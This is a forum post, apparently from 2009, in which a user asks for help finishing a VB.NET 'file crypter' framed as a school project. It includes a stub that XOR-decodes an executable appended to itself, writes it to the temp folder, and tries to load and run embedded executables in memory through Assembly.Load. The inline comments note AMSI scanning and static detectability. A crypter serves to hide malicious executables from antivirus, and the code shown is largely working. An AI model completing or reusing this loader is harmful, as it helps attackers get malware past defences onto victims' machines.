Dec 18th, 2009, 04:27 PM
Loading executable into memory
Alright, for a school project I'm making a file crypter, and I need to load the executable directly into memory.
For those who don't know it yet, a crypter consists of the crypter itself and a separate "stub".
The crypter encrypts the file and the stub is bound to the file; upon execution, the stub runs and in turn executes the file it is bound to.
I have a RunPE sub, and on its own it works fine
Code:
Imports System.Runtime.CompilerServices
Imports System.Reflection
' Form that, on a button click, loads an executable embedded in this assembly as a
' manifest resource and invokes its entry point inside the current process.
' No file is written and no child process is created; the payload exists only as a byte array.
' Detection note: Assembly.Load(Byte()) is the in-memory load path that .NET Framework 4.8
' and later submit to AMSI, so registered antimalware providers get to scan these bytes.
Public Class Form1
' Button handler: runs RunInternalExe on a new thread.
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Dim x As New Threading.Thread(AddressOf RunInternalExe)
x.Start()
End Sub
' Looks through this assembly's manifest resource names for one containing "test.exe",
' reads that resource into a byte array, loads it as an assembly and invokes its entry point.
' Returns without doing anything if no resource stream can be opened.
Private Sub RunInternalExe()
Dim CurrentAssembly As Reflection.Assembly = Reflection.Assembly.GetExecutingAssembly()
Dim Resource As String = String.Empty
Dim ArrResources As String() = CurrentAssembly.GetManifestResourceNames()
' Resource is declared outside the loop, so it still holds a value after the loop ends.
' NOTE(review): when no name matches, it appears to keep the last name enumerated - confirm.
For Each Resource In ArrResources
If Resource.IndexOf("test.exe") > -1 Then Exit For
Next
Dim ResourceStream As IO.Stream = CurrentAssembly.GetManifestResourceStream(Resource)
If ResourceStream Is Nothing Then
Return
End If
' Buffer sized to the stream length; the return value of Read is not checked.
Dim ResourcesBuffer(CInt(ResourceStream.Length) - 1) As Byte
ResourceStream.Read(ResourcesBuffer, 0, ResourcesBuffer.Length)
ResourceStream.Close()
' Loads the assembly from the in-memory bytes rather than from a path on disk.
Dim assembly As Assembly = assembly.Load(ResourcesBuffer)
Dim entryPoint As MethodInfo = [assembly].EntryPoint
' CreateInstance is given the entry method's name, not a type name.
' NOTE(review): presumably this yields Nothing for a normal Main - confirm.
Dim objectValue As Object = RuntimeHelpers.GetObjectValue([assembly].CreateInstance(entryPoint.Name))
' Invokes the entry point with a single String() argument containing "1".
entryPoint.Invoke(RuntimeHelpers.GetObjectValue(objectValue), New Object() {New String() {"1"}})
End Sub
End Class
this code will successfully load "test.exe"
but when i apply it to my stub like this
Code:
Imports System.Runtime.CompilerServices
Imports System.Reflection
' Stub form: on load it reads its own executable file, splits the contents on a marker
' string, XORs the part after the marker with a hard-coded key, writes the result to the
' temp directory and starts RunPE on a new thread.
' Analysis notes: the marker "-{@z3r0x@}-" and the key "SomeKeyString" are both stored in
' the stub, so the appended data can be located and decoded statically; the decoded file is
' also left on disk as <temp>\CryptedFile.exe.
Public Class Form1
' Marker that separates the stub from the data appended after it.
Const filesplit = "-{@z3r0x@}-"
' Runs when the form loads; performs the read / split / XOR / write sequence described above.
Private Sub Form1_Load(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.Load
' Every runtime error in this handler is suppressed, so a failure in any step below is silent.
On Error Resume Next
Dim TPath As String = System.IO.Path.GetTempPath
Dim file1, filezb4(), filezafter As String
Dim x As New Threading.Thread(AddressOf RunPE)
' Reads this executable's own file into a String through the legacy VB file API.
FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared)
file1 = Space(FileLen(1))
FileGet(1, file1)
FileClose(1)
' Element 1 is the text between the first and second occurrence of the marker
' (or to the end of the file if the marker occurs only once).
filezb4 = Split(file1, filesplit)
filezafter = xorcrypt(filezb4(1), "SomeKeyString")
' Writes the XOR output to <temp>\CryptedFile.exe.
FileOpen(5, TPath & "\CryptedFile.exe", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
FilePut(5, filezafter)
FileClose(5)
' Starts RunPE on the worker thread with the path of the file just written as its argument.
x.Start(TPath & "\CryptedFile.exe")
' Closes the form, then the End statement stops the program.
Me.Close()
End
End Sub
' Repeating-key XOR over the characters of filein, using key cyclically.
' The operation is its own inverse; it is an obfuscation layer, not encryption with a secret,
' because the key ships inside the same binary.
Private Function xorcrypt(ByVal filein As String, ByVal key As String) As String
Dim Index As Integer = 0
Dim ReturnValue As String = ""
For Each CharValue As Char In filein.ToCharArray
ReturnValue = String.Concat(ReturnValue, Chr(Asc(CharValue) Xor Asc(key.Substring(Index, 1))))
' Wrap around to the start of the key once its end is reached.
Index = (Index + 1) Mod key.Length
Next
Return ReturnValue
End Function
' Looks through this assembly's manifest resource names for one containing the string
' passed in stuff, reads that resource into a byte array, loads it as an assembly and
' invokes its entry point. Returns without doing anything if no resource stream can be opened.
Private Sub RunPE(ByVal stuff As String)
Dim CurrentAssembly As Reflection.Assembly = Reflection.Assembly.GetExecutingAssembly()
Dim Resource As String = String.Empty
Dim ArrResources As String() = CurrentAssembly.GetManifestResourceNames()
For Each Resource In ArrResources
If Resource.IndexOf(stuff) > -1 Then Exit For
Next
Dim ResourceStream As IO.Stream = CurrentAssembly.GetManifestResourceStream(Resource)
If ResourceStream Is Nothing Then
Return
End If
' Buffer sized to the stream length; the return value of Read is not checked.
Dim ResourcesBuffer(CInt(ResourceStream.Length) - 1) As Byte
ResourceStream.Read(ResourcesBuffer, 0, ResourcesBuffer.Length)
ResourceStream.Close()
' In-memory assembly load; on .NET Framework 4.8 and later this call path is scanned via AMSI.
Dim assembly As Assembly = assembly.Load(ResourcesBuffer)
Dim entryPoint As MethodInfo = [assembly].EntryPoint
Dim objectValue As Object = RuntimeHelpers.GetObjectValue([assembly].CreateInstance(entryPoint.Name))
' Invokes the entry point with a single String() argument containing "1".
entryPoint.Invoke(RuntimeHelpers.GetObjectValue(objectValue), New Object() {New String() {"1"}})
End Sub
End Class
^ Doesn't load the file it's bound to ^
Note also that if I leave out the RunPE call and just start the bound executable like this
Code:
' Starts the file written to the temp directory as a separate process, from disk.
System.Diagnostics.Process.Start(TPath & "\CryptedFile.exe")
it DOES work (but then the file isn't loaded directly into memory, of course, which IS a requirement)
thanks in advance everyone!